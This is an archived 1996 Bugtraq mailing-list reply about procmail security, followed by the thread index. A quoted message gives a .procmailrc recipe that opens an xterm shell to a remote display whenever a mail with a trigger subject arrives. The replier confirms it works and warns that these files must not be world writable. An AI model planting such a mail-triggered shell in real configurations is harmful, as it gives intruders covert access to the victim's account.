Bugtraq mailing list archives
Re: procmail
From: ming () math uh edu (James Wang)
Date: Tue, 6 Aug 1996 17:58:29 -0500
On Tue, 6 Aug 1996, Neil Soveran-Charley wrote:
I think there may well be such an exploit. I'd guess it is simply something like: (.procmailrc contents) :0 Hc * ^Subject:.*APassword /usr/bin/X11/xterm -display <some display> -e <a shell> (end .procmailrc)
I try it with a different usr account then my and it does work. It shows the owner as the person that receiving the mail. It needed a | in-front of /usr/bin/X11/xterm ..... It might work with just the command in .forward. So, it might not only procmail's problem. One must make sure his/her .procmailrc and .forward are not world writable.
I'm sure procmail MUST have some security feature to disallow this sort of thing? But I could be wrong, and haven't checked the manual pages yet.
No. Since there is no way for procmail to know before hand what kind of program that you might use.
Current thread:
- Re: Exploiting Zolaris 2.4 ?? :) Leif Hedstrom (Aug 04)
- <Possible follow-ups>
- Re: Exploiting Zolaris 2.4 ?? :) Fletch (Aug 04)
- Re: your mail Greg Woods (Aug 05)
- Re: your mail neill (Aug 05)
- PAM login programs? Josh Wilmes (Aug 05)
- procmail DANIEL .D .EZEKIEL (Aug 05)
- (Fwd) CERT Advisory CA-96.17 - Vulnerability in Solaris vold Hubert Feyrer (Aug 06)
- Re: procmail Adam Shostack (Aug 06)
- Re: procmail Jon Lewis (Aug 06)
- Re: procmail Neil Soveran-Charley (Aug 06)
- Re: procmail James Wang (Aug 06)
- Re: procmail Kari E. Hurtta (Aug 06)
- Re: procmail Ficus Kirkpatrick (Aug 07)
- Re: procmail Melody Lynn Yoon (Aug 07)
- Re: your mail Greg Woods (Aug 05)
- Re: PAM login programs? Marek Michalkiewicz (Aug 06)
- Re: PAM login programs? Arthur Donkers (Aug 06)